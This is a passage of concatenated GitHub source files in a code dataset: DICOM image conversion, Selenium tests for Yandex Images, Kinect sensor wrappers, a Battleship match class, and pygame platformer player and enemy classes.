+= 1\n\n arr = arr[:expected_bit_length]\n\n if overlay_frames == 1:\n arr = arr.reshape(rows, cols)\n color_img = cv2.cvtColor(img_array[0], cv2.COLOR_GRAY2BGR)\n color_img[np.where(arr != 0)] = [120, 251, 251]\n cv2.imwrite(Image_path, color_img)\n switch = 1\n except KeyError:\n print(\"No Overlay Data in Dicom File\")\n\n if switch == 0:\n cv2.imwrite(Image_path, img_array[0])\n # 用PLI的image.save写入压缩片\n Compress_Image = Image.open(Image_path)\n Compress_Image.save(Image_path_compress, optimize=True, quality=10)\n else : #一个dicom文件里有不止一幅图,说明属于第二种情况,这个dicom文件本身就是一个序列,以图片在序列里的\n #顺序给图片命名(因为这时没有instance number或者这些图instance number都是一样的),命名方式为:\n #Image_name = StudyInstanceUID + \"_\" + SeriesNumber + \"_\" + str(j) + \".jpg\"\n for j in range(Image_Number): #一个dicom含有多张图像的,就用其排布的图片顺序依次命名\n Image_name = StudyInstanceUID + \"_\" + SeriesInstanceUID + \"_\" + str(j) + \".jpg\"\n Image_path = Write_Path_Folder_StudyInstanceUID_SeriesInstanceUID + \"\\\\\" + Image_name\n Image_path_compress = Write_Path_Folder_StudyInstanceUID_SeriesInstanceUID_Compress + \"\\\\\" + Image_name\n\n if WindowCenter != \"NA\" and WindowWidth != \"NA\":\n c = int(WindowCenter)\n w = int(WindowWidth)\n min = c - w / 2\n uint2float = np.float32(img_array[j])\n uint2float = uint2float - min\n uint2float = uint2float * (255 / w)\n uint2float[uint2float < 0] = 0\n uint2float[uint2float > 255] = 255\n img_array[j] = np.uint16(uint2float)\n\n if len(img_array[j].shape) == 3:\n imgBGR2RGB = cv2.cvtColor(img_array[j], cv2.COLOR_BGR2RGB)\n try:\n overlay_data = Dicom_Head[0x60003000].value\n rows = Dicom_Head[0x60000010].value\n cols = Dicom_Head[0x60000011].value\n overlay_frames = Dicom_Head[0x60000015].value\n overlay_type = Dicom_Head[0x60000040].value\n bits_allocated = Dicom_Head[0x60000100].value\n overlay_origin = Dicom_Head[0x60000050].value\n\n np_dtype = np.dtype('uint8')\n length_of_pixel_array = len(overlay_data)\n expected_length = rows * cols\n\n if bits_allocated == 1:\n expected_bit_length = expected_length\n expected_length = int(expected_length / 8) + (expected_length % 8 > 0)\n\n bit = 0\n arr = np.ndarray(shape=(length_of_pixel_array * 8), dtype=np_dtype)\n\n for 
byte in overlay_data:\n for bit in range(bit, bit + 8):\n arr[bit] = byte & 1\n byte >>= 1\n bit += 1\n\n arr = arr[:expected_bit_length]\n\n if overlay_frames == 1:\n arr = arr.reshape(rows, cols)\n\n imgBGR2RGB[np.where(arr != 0)] = [120, 251, 251]\n except KeyError:\n print(\"No Overlay Data in Dicom File\")\n cv2.imwrite(Image_path, imgBGR2RGB)\n else:\n try:\n overlay_data = Dicom_Head[0x60003000].value\n rows = Dicom_Head[0x60000010].value\n cols = Dicom_Head[0x60000011].value\n overlay_frames = Dicom_Head[0x60000015].value\n overlay_type = Dicom_Head[0x60000040].value\n bits_allocated = Dicom_Head[0x60000100].value\n overlay_origin = Dicom_Head[0x60000050].value\n\n np_dtype = np.dtype('uint8')\n length_of_pixel_array = len(overlay_data)\n expected_length = rows * cols\n\n if bits_allocated == 1:\n expected_bit_length = expected_length\n expected_length = int(expected_length / 8) + (expected_length % 8 > 0)\n\n bit = 0\n arr = np.ndarray(shape=(length_of_pixel_array * 8), dtype=np_dtype)\n\n for byte in overlay_data:\n for bit in range(bit, bit + 8):\n arr[bit] = byte & 1\n byte >>= 1\n bit += 1\n\n arr = arr[:expected_bit_length]\n\n if overlay_frames == 1:\n arr = arr.reshape(rows, cols)\n color_img = cv2.cvtColor(img_array[j], cv2.COLOR_GRAY2BGR)\n color_img[np.where(arr != 0)] = [120, 251, 251]\n cv2.imwrite(Image_path, color_img)\n switch = 1\n\n except KeyError:\n print(\"No Overlay Data in Dicom File\")\n if switch == 0:\n cv2.imwrite(Image_path, img_array[j])\n # 用PLI的image.save写入压缩片\n Compress_Image = Image.open(Image_path)\n Compress_Image.save(Image_path_compress, optimize=True, quality=10)\n","repo_name":"billlaw6/python_utils","sub_path":"dicom_parse_v4_szw.py","file_name":"dicom_parse_v4_szw.py","file_ext":"py","file_size_in_byte":18768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12210955312","text":"from pages.images_page import ImagesPage\nfrom pages.locators import ImagesPageLocators\nfrom pages.main_page import MainPage\n\n\nclass TestCaseImagesInYandex:\n def test_should_be_images_link(self, browser):\n \"\"\"Проверка наличия ссылки «Картинки»\"\"\"\n page = MainPage(browser)\n page.open()\n page.should_be_images_link()\n\n def test_is_images_page(self, browser):\n \"\"\"Проверка перехода на страницу «Картинки»\"\"\"\n page = MainPage(browser)\n page.open()\n page.go_to_images_page()\n page.is_current_link(ImagesPageLocators.IMAGES_LINK)\n\n def test_open_first_category_check_text(self, browser):\n \"\"\"Проверка открытия категорий и соответствия текста в поиске\"\"\"\n page = MainPage(browser)\n page.open()\n page.go_to_images_page()\n images_page = ImagesPage(browser)\n images_page.open_category()\n images_page.check_text()\n\n def test_open_image(self, browser):\n \"\"\"Проверка открытия изображения\"\"\"\n page = ImagesPage(browser, ImagesPageLocators.IMAGES_LINK)\n page.open()\n page.open_category()\n page.click_firs_image()\n page.image_should_be_change()\n\n\n\n\n","repo_name":"bashkoigor/yandex_auto_tests","sub_path":"tests/test_images_page.py","file_name":"test_images_page.py","file_ext":"py","file_size_in_byte":1344,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30604354864","text":"import pandas as pd\nimport numpy as np\n\ndf = pd.read_csv(\"TablasEs/StatResumen.csv\")\nmeses = 
['enero','febrero','marzo','abril','mayo','junio','julio','agosto','septiembre','octubre','noviembre','diciembre']\n#******************************************************************\n#\t\t\t\tRemoving the hours from the Fecha column\n#******************************************************************\na = df['Fecha'].to_list()\nlista = a[0][0:11]\nfor i, lista in enumerate(a):\n lista = lista[0:11]\n a[i] = lista\nprint(a)\ndf['Fecha'] = a\ndel df['Unnamed: 0']\nprint(df)\nprint(df.columns)\nwith pd.ExcelWriter(\"StatResumen.xlsx\") as writer:\n df.to_excel(writer, sheet_name='Sheet1')\ndf[\"Fecha\"] = pd.to_datetime(df[\"Fecha\"])\n#******************************************************************\n#\t\t\t\tConvert month numbers to month names\n#******************************************************************\nfor i,m in enumerate(meses):\n mask = df.Fecha.dt.month == i+1\n print(i+1)\n print(m)\n #print(mask)\n mask.replace(True, np.nan, inplace = True)\n print(mask)\n\nprint(df)","repo_name":"Lionhardv2/Test","sub_path":"PresTab.py","file_name":"PresTab.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"18268719641","text":"from pykinect import nui\nfrom openni import openni2, nite2, utils\nfrom openni import _openni2 as c_api\nimport numpy as np\nimport cv2\nimport _thread\nfrom .abstract import Sensor\nfrom global_configs import *\n\n\n__all__ = ['KinectMS1', 'KinectNI']\n\nnp.set_printoptions(suppress=True)\n\n\nclass KinectMS1(Sensor):\n \"\"\"Kinect CDT with Microsoft backends.\"\"\"\n def __init__(self):\n super(KinectMS1, self).__init__()\n self._screen_lock = _thread.allocate()\n self.joints_per_person = SensorJointNumber.KINECT_V1\n\n def initialize_device(self):\n self._device = nui.Runtime()\n self._motor = self._device\n self._user_tracker = self._device.skeleton_engine\n self._user_tracker.enabled = True\n self._color_stream = self._device.video_stream\n self._depth_stream = self._device.depth_stream\n self.set_color_stream()\n self.set_depth_stream()\n self.handle_color_frame()\n self.handle_depth_frame()\n self.handle_skeleton_frame()\n self.is_opened = True\n\n def set_color_stream(self):\n self._color_stream.open(nui.ImageStreamType.Video, 2,\n nui.ImageResolution.Resolution640x480,\n nui.ImageType.Color)\n\n def set_depth_stream(self):\n self._depth_stream.open(nui.ImageStreamType.Depth, 2,\n nui.ImageResolution.Resolution320x240,\n nui.ImageType.Depth)\n\n def handle_color_frame(self):\n self._device.video_frame_ready += self.update_color_frame\n\n def handle_depth_frame(self):\n self._device.depth_frame_ready += self.update_depth_frame\n\n def handle_skeleton_frame(self):\n self._device.skeleton_frame_ready += self.update_skeletons\n\n def update_color_frame(self, raw_frame):\n color_frame = np.empty((FRAME_HEIGHT, FRAME_WIDTH, 4), np.uint8)\n raw_frame.image.copy_bits(color_frame.ctypes.data)\n color_frame = cv2.resize(color_frame, dsize=(FRAME_WIDTH, FRAME_HEIGHT))\n self._color_frame = cv2.cvtColor(color_frame, cv2.COLOR_BGRA2RGB)\n\n def update_depth_frame(self, raw_frame):\n # copy the raw 16-bit depth frame first, then strip the 3 player-index bits and scale down to 8 bits\n depth_frame = np.empty((FRAME_HEIGHT // 2, FRAME_WIDTH // 2, 1), np.uint16)\n raw_frame.image.copy_bits(depth_frame.ctypes.data)\n depth_frame = (depth_frame >> 3) & 4095\n depth_frame >>= 4\n depth_frame = cv2.resize(depth_frame.squeeze(), dsize=(FRAME_WIDTH, FRAME_HEIGHT))\n self._depth_frame = depth_frame.astype(np.uint8)\n\n def update_skeletons(self, frame):\n skeletons = []\n 
for skeleton in frame.SkeletonData:\n if skeleton.eTrackingState == nui.SkeletonTrackingState.TRACKED:\n self.skeleton_available = True\n skeletons.append(skeleton)\n num_skeletons = len(skeletons)\n if not num_skeletons:\n self.skeleton_available = False\n return\n self._skeleton = skeletons[0]\n if num_skeletons > 1:\n self._skeleton2 = skeletons[1]\n\n def read_color_frame(self):\n return True, self._color_frame\n\n def read_depth_frame(self):\n return True, self._depth_frame\n\n def tilt_up(self):\n with self._screen_lock:\n current_angle = self.get_tilt_angle()\n self._motor.camera.elevation_angle = current_angle + 2 if current_angle < MAXIMUM_ELEVATION \\\n else current_angle\n\n def tilt_down(self):\n with self._screen_lock:\n current_angle = self.get_tilt_angle()\n self._motor.camera.elevation_angle = current_angle - 2 if current_angle > MINIMUM_ELEVATION \\\n else current_angle\n\n def get_tilt_angle(self):\n return self._motor.camera.get_elevation_angle()\n\n def get_skeleton1(self) -> np.ndarray:\n ret = np.zeros((self.joints_per_person, 4), dtype=np.float32)\n if self._skeleton is not None:\n for idx, joint in enumerate(self._skeleton.SkeletonPositions):\n x = joint.x * 1000\n y = joint.y * 1000\n z = joint.z * 1000\n w = joint.w\n ret[idx] = (x, y, z, w)\n return ret\n\n def get_skeleton2(self) -> np.ndarray:\n ret = np.zeros((self.joints_per_person, 4), dtype=np.float32)\n if self._skeleton2 is not None:\n for idx, joint in enumerate(self._skeleton2.SkeletonPositions):\n x = joint.x * 1000\n y = joint.y * 1000\n z = joint.z * 1000\n w = joint.w\n ret[idx] = (x, y, z, w)\n return ret\n\n def close(self):\n if self._device is not None:\n self._device = None\n self.is_opened = False\n\n\n# deprecated\nclass KinectNI(Sensor):\n \"\"\"Kinect CDT with PrimeSense backends. 
Motor uses Microsoft backend.\"\"\"\n def __init__(self):\n super(KinectNI, self).__init__()\n self._screen_lock = _thread.allocate()\n self.confidence_thres = DEFAULT_CONFIDENCE_THRES\n self.joints_per_person = SensorJointNumber.OPENNI\n\n def initialize_device(self):\n openni2.initialize()\n nite2.initialize()\n self._device = openni2.Device.open_any()\n self._motor = nui.Runtime()\n self.set_depth_stream()\n self.set_color_stream()\n self._user_tracker = nite2.UserTracker(self._device)\n self.is_opened = True\n\n def set_depth_stream(self):\n self._depth_stream = self._device.create_depth_stream()\n self._depth_stream.set_video_mode(\n c_api.OniVideoMode(pixelFormat=c_api.OniPixelFormat.ONI_PIXEL_FORMAT_DEPTH_1_MM,\n resolutionX=FRAME_WIDTH, resolutionY=FRAME_HEIGHT, fps=FRAME_RATE))\n self._depth_stream.start()\n\n def set_color_stream(self):\n self._color_stream = self._device.create_color_stream()\n self._color_stream.set_video_mode(\n c_api.OniVideoMode(pixelFormat=c_api.OniPixelFormat.ONI_PIXEL_FORMAT_RGB888,\n resolutionX=FRAME_WIDTH, resolutionY=FRAME_HEIGHT, fps=FRAME_RATE))\n self._color_stream.start()\n\n def read_color_frame(self):\n if self._color_stream is not None:\n try:\n raw_frame = self._color_stream.read_frame()\n self._color_frame = np.array(raw_frame.get_buffer_as_triplet()).reshape([FRAME_HEIGHT, FRAME_WIDTH, 3])\n return True, self._color_frame\n except (utils.OpenNIError, utils.NiteError, OSError):\n return False, None\n\n def read_depth_frame(self):\n if self._depth_stream is not None:\n try:\n raw_data = self._depth_stream.read_frame().get_buffer_as_uint16()\n raw_frame = np.ndarray((FRAME_HEIGHT, FRAME_WIDTH), dtype=np.uint16, buffer=raw_data)\n self._depth_frame = ((raw_frame + 1024) / 256).astype('uint8')\n self.skeleton_available = self.update_skeletons()\n return True, self._depth_frame\n except (utils.OpenNIError, utils.NiteError, OSError):\n return False, None\n\n def update_skeletons(self) -> bool:\n skeleton_frame = self._user_tracker.read_frame()\n if skeleton_frame.users:\n user = skeleton_frame.users[0]\n if user.is_new():\n self._user_tracker.start_skeleton_tracking(user.id)\n elif user.skeleton.state == nite2.SkeletonState.NITE_SKELETON_TRACKED and user.is_visible():\n self._skeleton = user.skeleton\n return True\n return False\n\n def tilt_up(self):\n with self._screen_lock:\n current_angle = self.get_tilt_angle()\n self._motor.camera.elevation_angle = current_angle + 2 if current_angle < MAXIMUM_ELEVATION \\\n else current_angle\n\n def tilt_down(self):\n with self._screen_lock:\n current_angle = self.get_tilt_angle()\n self._motor.camera.elevation_angle = current_angle - 2 if current_angle > MINIMUM_ELEVATION \\\n else current_angle\n\n def get_tilt_angle(self):\n return self._motor.camera.get_elevation_angle()\n\n def close(self):\n if self._device is not None:\n if self._depth_stream is not None:\n self._depth_stream.stop()\n if self._color_stream is not None:\n self._color_stream.stop()\n if self._user_tracker is not None:\n self._user_tracker.close()\n if self._motor is not None:\n self._motor.close()\n nite2.unload()\n openni2.unload()\n self.is_opened = False\n\n def set_confidence_thres(self, thres: float):\n self.confidence_thres = thres\n\n def get_skeleton1(self) -> np.ndarray:\n ret = np.zeros((self.joints_per_person, 4), dtype=np.float32)\n if self._skeleton is not None:\n for idx, joint in enumerate(self._skeleton.joints):\n ret[idx] = joint.position.x, joint.position.y, joint.position.z, joint.positionConfidence\n return ret\n\n 
def get_skeleton2(self):\n ret = np.zeros((self.joints_per_person, 4), dtype=np.float32)\n return ret\n","repo_name":"howieraem/KinectActionDetection","sub_path":"sensor/kinect.py","file_name":"kinect.py","file_ext":"py","file_size_in_byte":9236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"2150336413","text":"from gameboard import GameBoard\nclass Match(GameBoard):\n\n def __init__(self, ship_owner, bomb_owner, board_size):\n #receive all data from the match\n self.board = GameBoard(board_size).set_up_board()\n self.ship_owner = ship_owner\n self.bomb_owner = bomb_owner\n\n self.ship_positions = ship_owner.board_positions\n self.bombs_positions = bomb_owner.bomb_position\n self.plot_ship()\n\n def plot_ship(self):\n #plot ship into the board\n for ship_position in self.ship_positions:\n for position in ship_position:\n ship_row = position[0]\n ship_column = position[1]\n row = int(ship_row)\n #change the value of the position to 1\n #try:\n self.board[row -1][ship_column] = 1\n #except IndexError:\n #return \" Position is not available\"\n #exit(1)\n def get_result(self):\n for bomb in self.bombs_positions:\n bomb_column = bomb[-1]\n bomb_row = int(bomb[:-1])\n if(self.board[bomb_row - 1][bomb_column] == 1):\n self.board[bomb_row - 1][bomb_column] = 2\n # print('The ship was hit by bomb: {}'.format(bomb))\n\n elif(self.board[bomb_row - 1][bomb_column] == 2):\n pass\n #\n print ('The position was already bombed')\n else:\n print ('The ship was not hit')\n\n def destroyed_ship(self):\n #check the state of every position of each ship on the board\n for ship_position in self.ship_positions:\n ship_state = []\n intact_states = [0 , 1]\n for position in ship_position:\n ship_row = position[0]\n ship_column = position[1]\n row = int(ship_row)\n #read the state of the position\n #try:\n state_of_ship = self.board[row -1][ship_column]\n ship_state.append(state_of_ship)\n\n if any(state_of in ship_state for state_of in intact_states):\n print (\"ship survived\")\n else:\n print (\"ship at {} defeated\".format(ship_position))\n #except IndexError:\n #return \" Position is not available\"\n #exit(1)\n","repo_name":"JulioCezar32/naval-war","sub_path":"sample/match.py","file_name":"match.py","file_ext":"py","file_size_in_byte":2274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"30446026773","text":"from math import atan2, cos, floor, radians, sin\nfrom random import choice, randint\n\nfrom pygame.math import Vector2\nfrom pygame.rect import Rect\nfrom pygame.sprite import Group, Sprite\nfrom pygame.surface import Surface\nfrom pygame.time import get_ticks\nfrom pygame.transform import flip, smoothscale\n\nfrom .classes import Gold\nfrom .constants import GOLD, GRAVITY, GREEN, ORANGE, RED, TILE_SIZE\nfrom .functions import load_images\nfrom .guns import Handgun, Minigun, Shotgun\nfrom .texts import DamageText\n\n\nclass Player(Sprite):\n def __init__(self, position: tuple, images: tuple, selected_gun: str, enemies: Group, gold_group: Group, bullet_group: Group, texts: Group, upgrades: list, gold: int, health: int, max_health: int):\n super().__init__()\n\n self.animations = {\"idle\": [], \"run\": [], \"climb\": images[2], \"jump\": []}\n for image in images[0]:\n self.animations[\"idle\"].append(smoothscale(image, (image.get_width() * 1.5, image.get_height() * 1.5)))\n for image in images[1]:\n self.animations[\"run\"].append(smoothscale(image, (image.get_width() * 1.5, image.get_height() * 1.5)))\n self.animations[\"idle\"] = 
tuple(self.animations[\"idle\"])\n self.animations[\"run\"] = tuple(self.animations[\"run\"])\n self.animations[\"jump\"].append(smoothscale(images[3], (images[3].get_width() * 1.5, images[3].get_height() * 1.5)))\n self.frame_index = 0\n self.action = \"idle\"\n self.cooldowns = {\"idle\": 0.15, \"run\": 0.3, \"climb\": 0.2, \"jump\": 0.01}\n self.image = self.animations[self.action][self.frame_index]\n self.flip = False\n\n # collision rect\n self.rect = self.image.get_rect(midbottom=position)\n\n # movement stuff\n self.speed = 8\n self.vector = Vector2(0, 0) # direction of movement\n self.jump_speed = -18\n self.on_ground = True\n self.climbing = False\n\n # health stuff\n self.max_health = max_health\n self.health = health\n self.max_mana = 100\n self.mana = self.max_mana\n self.mana_regen = 0.1\n self.invincible = False\n self.invincibility_duration = 90 # frames\n self.debuffs = {\"burning\": 0, \"poison\": 0} # debuff name: amount of get_damage to get\n\n # pressed keys\n self.up = False\n self.down = False\n self.left = False\n self.right = False\n self.jump = False\n self.key_shoot = False\n self.key_special = False\n\n self.gold = gold\n\n # external groups\n self.enemies = enemies\n self.gold_group = gold_group\n self.bullet_group = bullet_group\n self.texts = texts\n\n # shooting\n if selected_gun == \"handgun\":\n self.gun = Handgun(self.bullet_group, self.vector)\n self.gun_images = load_images(\"data/img/guns/handgun\", \"handgun_\", 1.5, 1)\n elif selected_gun == \"shotgun\":\n self.gun = Shotgun(self.bullet_group, self.vector)\n self.gun_images = load_images(\"data/img/guns/shotgun\", \"shotgun_\", 1.5, 1)\n elif selected_gun == \"minigun\":\n self.gun = Minigun(self.bullet_group, self.vector)\n self.gun_images = load_images(\"data/img/guns/minigun\", \"minigun_\", 1.5, 1)\n\n # apply bought upgrades\n for upgrade in upgrades:\n if upgrade == \"BulletSpeedUp\":\n self.gun.cooldown = int(self.gun.cooldown * 0.8)\n elif upgrade == \"ManaRegen\":\n self.mana_regen += 0.05\n elif upgrade == \"ManaUp\":\n self.max_mana += 25\n self.mana += 25\n elif upgrade == \"SpeedUp\":\n self.speed += 1\n self.jump_speed -= 1\n elif upgrade == \"Strength\":\n self.gun.damage = (self.gun.damage[0] + 1, self.gun.damage[1] + 2)\n\n def get_damage(self, damage: int):\n self.health -= damage\n if self.debuffs[\"burning\"] > 0:\n color = ORANGE\n elif self.debuffs[\"poison\"] > 0:\n color = GREEN\n else:\n color = RED\n self.texts.add(DamageText((randint(self.rect.left, self.rect.right), randint(self.rect.top - 8, self.rect.top + 8)), str(damage), color))\n self.invincible = True\n\n def update_action(self, new_action: str):\n if new_action != self.action:\n self.action = new_action\n self.frame_index = 0\n\n def check_horizontal_collisions(self, tiles: set):\n for tile in tiles:\n if tile.rect.colliderect(self.rect):\n # touching right wall\n if self.vector.x < 0:\n self.rect.left = tile.rect.right\n return # finish looking for collisions\n # touching left wall\n elif self.vector.x > 0:\n self.rect.right = tile.rect.left\n return # finish looking for collisions\n\n def check_vertical_collisions(self, tiles: set):\n for tile in tiles:\n if tile.rect.colliderect(self.rect):\n # touching floor - stop falling, allow jump, stop climbing\n if self.vector.y > 0:\n self.vector.y = 0\n self.rect.bottom = tile.rect.top\n self.on_ground = True\n self.climbing = False\n return # finish looking for collisions\n # touching ceiling - start falling\n elif self.vector.y < 0:\n self.vector.y = 0\n self.rect.top 
= tile.rect.bottom\n return # finish looking for collisions\n\n # if player is in air and collision didn't happen, disable jump\n # without it, when falling from a block, you can jump in air\n if self.vector.y > 1:\n self.on_ground = False\n\n def check_ladder_collisions(self, ladders: set):\n ladder_collision = False\n \n for ladder in ladders:\n if self.rect.colliderect(ladder.rect):\n ladder_collision = True\n\n # center player on the ladder\n if self.climbing:\n self.vector.y = 0\n self.rect.centerx = ladder.rect.centerx - 4\n\n # go up\n if self.up:\n self.vector.y -= self.speed * 0.75\n if not self.climbing:\n self.climbing = True\n\n # go down\n if self.down:\n self.vector.y += self.speed * 0.75\n if not self.climbing:\n self.climbing = True\n\n # allow moving when on top of ladder\n if not ladder_collision:\n self.climbing = False\n\n def check_platform_collisions(self, platforms: set):\n collision_rect = Rect(self.rect.x, self.rect.bottom, self.rect.width, 8)\n # check 'feet' (collision_rect) colliding with platform\n for platform in platforms:\n if platform.rect.colliderect(collision_rect):\n # touching platform - stop falling, allow jump, stop climbing\n if self.vector.y > 0:\n self.vector.y = 0\n self.rect.bottom = platform.rect.top\n self.on_ground = True\n self.climbing = False\n\n # jump from the platform\n if self.down and self.jump:\n self.on_ground = False\n self.vector.y += 8.5\n\n break\n\n def check_lava_collisions(self, lava_tiles: set):\n for lava_tile in lava_tiles:\n if self.rect.colliderect(lava_tile.rect):\n # slow player while in lava, allow to \"swim\" (jmup)\n self.speed = 2\n self.jump_speed = -9\n self.vector.y *= 0.3\n self.on_ground = True\n\n if not self.invincible:\n # recieve damage from lava\n self.get_damage(randint(lava_tile.damage[0], lava_tile.damage[1]))\n # apply debuff\n self.debuffs[\"burning\"] = 3\n\n return\n\n # restore speed values if not in lava\n self.speed = 8\n self.jump_speed = -18\n\n def check_enemy_collisions(self):\n for enemy in self.enemies:\n if self.rect.colliderect(enemy.rect):\n damage = randint(enemy.damage[0], enemy.damage[1])\n self.get_damage(damage)\n if isinstance(enemy, SpiderAdvanced):\n if randint(0, 5) < 2:\n self.debuffs[\"poison\"] = 5\n break\n\n def check_coins_collisions(self):\n for gold in self.gold_group:\n if self.rect.colliderect(gold.rect):\n self.gold += gold.amount\n self.texts.add(DamageText(self.rect.midtop, f\"{gold.amount}$\", GOLD))\n gold.kill()\n return gold.amount * 10\n return\n\n def draw(self, screen: Surface, scroll: set):\n screen.blit(self.image, (self.rect.x - scroll[0], self.rect.y - scroll[1]))\n\n def update(self, screen: Surface, scroll: list, objects: dict):\n # update x position and check for horizontal collisions\n self.rect.x += self.vector.x\n self.check_horizontal_collisions(objects[\"collidable\"])\n \n # update y position and check for verical collisions\n self.vector.y += GRAVITY\n self.rect.y += self.vector.y\n self.check_vertical_collisions(objects[\"collidable\"])\n\n # check for collisions with other objects (except enemies)\n self.check_ladder_collisions(objects[\"ladders\"])\n self.check_platform_collisions(objects[\"platforms\"])\n self.check_lava_collisions(objects[\"lava\"])\n score = self.check_coins_collisions()\n\n # update shoot cooldown\n if self.gun.cooldown > 0:\n self.gun.cooldown -= 1\n\n # regenerate mana\n if self.mana < self.max_mana:\n self.mana += self.mana_regen\n\n # shoot\n if self.key_shoot:\n self.gun.shoot(self.rect, self.flip, self.up, 
self.down)\n # special\n if self.key_special:\n self.mana = self.gun.special(self.rect, self.flip, self.mana, self.up, self.down)\n\n # move left\n if self.left:\n if not self.climbing:\n self.vector.x = -self.speed\n self.update_action(\"run\")\n self.flip = True\n # or move right\n elif self.right:\n if not self.climbing:\n self.vector.x = self.speed\n self.update_action(\"run\")\n self.flip = False\n # or stop moving\n else:\n self.vector.x = 0\n if not self.climbing:\n self.update_action(\"idle\")\n # jump (from ground or from ladder)\n if (self.jump and self.on_ground) or (self.jump and self.climbing):\n self.vector.y = self.jump_speed\n self.jump = False\n self.on_ground = False\n self.climbing = False\n\n # set max falling speed\n if self.vector.y > 18:\n self.vector.y = 18\n\n if not self.climbing and not self.on_ground:\n self.update_action(\"jump\")\n elif self.climbing:\n self.update_action(\"climb\")\n\n # check for collisions with enemies\n if not self.invincible:\n self.check_enemy_collisions()\n # get damage from debuffs\n if self.debuffs[\"burning\"] > 0:\n self.get_damage(2)\n self.debuffs[\"burning\"] -= 1\n if self.debuffs[\"poison\"] > 0:\n self.get_damage(1)\n self.debuffs[\"poison\"] -= 1\n\n # update invincivbility\n if self.invincible:\n self.invincibility_duration -= 1\n if self.invincibility_duration <= 0:\n self.invincibility_duration = 90\n self.invincible = False\n\n # change animation frame\n if not self.climbing or (self.climbing and self.up or self.down):\n self.frame_index += self.cooldowns[self.action]\n if self.frame_index >= len(self.animations[self.action]):\n self.frame_index = 0\n # set new frame to the image and flip it if necessary\n self.image = flip(self.animations[self.action][floor(self.frame_index)], self.flip, False)\n\n # blinking if damaged\n if self.invincible:\n if sin(get_ticks()) >= 0:\n self.image.set_alpha(255)\n else:\n self.image.set_alpha(63)\n else:\n self.image.set_alpha(255)\n\n # draw player\n self.draw(screen, scroll)\n\n # draw gun\n if not self.climbing:\n if not self.on_ground:\n if self.up:\n offset_y = -16\n else:\n offset_y = -8\n else:\n offset_y = 0\n\n if not self.up and not self.down:\n if not self.flip:\n screen.blit(self.gun_images[0], (self.rect.x - scroll[0], self.rect.y - scroll[1] + offset_y))\n else:\n image = flip(self.gun_images[0], True, False)\n image_rect = image.get_rect(topright=(self.rect.right - scroll[0], self.rect.y - scroll[1] + offset_y))\n screen.blit(image, image_rect)\n elif self.up:\n if not self.flip:\n screen.blit(self.gun_images[1], (self.rect.x - scroll[0], self.rect.y - scroll[1] + offset_y))\n else:\n image = flip(self.gun_images[1], True, False)\n image_rect = image.get_rect(topright=(self.rect.right - scroll[0], self.rect.y - scroll[1] + offset_y))\n screen.blit(image, image_rect)\n elif self.down:\n if not self.flip:\n screen.blit(self.gun_images[2], (self.rect.x - scroll[0], self.rect.y - scroll[1] + offset_y))\n else:\n image = flip(self.gun_images[2], True, False)\n image_rect = image.get_rect(topright=(self.rect.right - scroll[0], self.rect.y - scroll[1] + offset_y))\n screen.blit(image, image_rect)\n\n return score\n\n\nclass EnemyBase(Sprite):\n def __init__(self, position: tuple, hp: int, damage: tuple, speed: tuple, gold: tuple, gold_group: Group):\n super().__init__()\n\n self.gold_group = gold_group\n\n # image and rect\n self.image = Surface((TILE_SIZE // 2, TILE_SIZE - 8))\n self.image.fill(RED)\n self.rect = self.image.get_rect(topleft=(position[0], position[1]))\n\n # 
health, damage, speed and gold amount from config file\n if isinstance(hp, tuple):\n self.health = randint(hp[0], hp[1])\n else:\n self.health = hp\n\n self.damage = tuple(damage)\n\n if isinstance(speed, tuple):\n self.speed = randint(speed[0], speed[1])\n else:\n self.speed = speed\n\n if isinstance(gold, tuple):\n self.gold_amount = randint(gold[0], gold[1])\n else:\n self.gold_amount = gold\n\n self.blinking = 0 # blinking time after damaged\n\n self.vector = Vector2(0, 0)\n\n # current status and idle time\n self.idling = False\n self.idling_counter = 0\n\n def get_damage(self, damage: int):\n self.health -= damage\n self.blinking = 30\n if self.health <= 0:\n if self.gold_amount > 0:\n self.gold_group.add(Gold((randint(self.rect.left, self.rect.right), self.rect.bottom), self.gold_amount))\n self.kill()\n return self.score_amount\n\n def draw(self, screen: Surface, scroll: list):\n screen.blit(self.image, (self.rect.x - scroll[0], self.rect.y - scroll[1]))\n\n def check_horizontal_collisions(self, tiles: set):\n for tile in tiles:\n if tile.rect.colliderect(self.rect):\n # touching right wall\n if self.vector.x < 0:\n self.rect.left = tile.rect.right\n self.vector.x *= -1\n break\n # touching left wall\n elif self.vector.x > 0:\n self.rect.right = tile.rect.left\n self.vector.x *= -1\n break\n\n def check_vertical_collisions(self, tiles: set):\n for tile in tiles:\n if tile.rect.colliderect(self.rect):\n # touching floor - stop falling\n self.rect.bottom = tile.rect.top\n self.vector.y = 0\n break\n\n\nclass Slime(EnemyBase):\n def __init__(self, position: tuple, images: tuple, gold_group: Group):\n super().__init__(position, 10, (1, 3), (1, 3), (0, 2), gold_group)\n self.animation = images\n self.frame_index = 0\n self.animation_length = len(images)\n self.image = self.animation[self.frame_index]\n self.rect = Rect(position[0], position[1], 48, 48)\n self.flip = False\n\n self.score_amount = 30\n\n self.vector.x = self.speed * choice((-1, 1))\n\n def draw(self, screen: Surface, scroll: list):\n screen.blit(self.image, (self.rect.x - 8 - scroll[0], self.rect.y - 16 - scroll[1]))\n\n def update(self, screen: Surface, scroll: list, tiles: set, platforms: set, player_rect: Rect, constraints: Group):\n if self.vector.x > 0:\n self.flip = True\n elif self.vector.x < 0:\n self.flip = False\n # update animation frame\n self.frame_index += 0.2\n if self.frame_index >= self.animation_length:\n self.frame_index = 0\n # set new frame to the image and flip it if necessary\n self.image = flip(self.animation[floor(self.frame_index)], self.flip, False)\n\n if not self.idling:\n # update x position and check for horizontal collisions\n self.rect.x += self.vector.x\n self.check_horizontal_collisions(tiles)\n\n # random idle\n if randint(1, 200) == 1:\n self.idling = True\n self.idling_counter = randint(30, 70)\n else:\n self.idling_counter -= 1\n # after idle - stop idling, randomly select direction of moving\n if self.idling_counter <= 0:\n self.idling = False\n self.vector.x 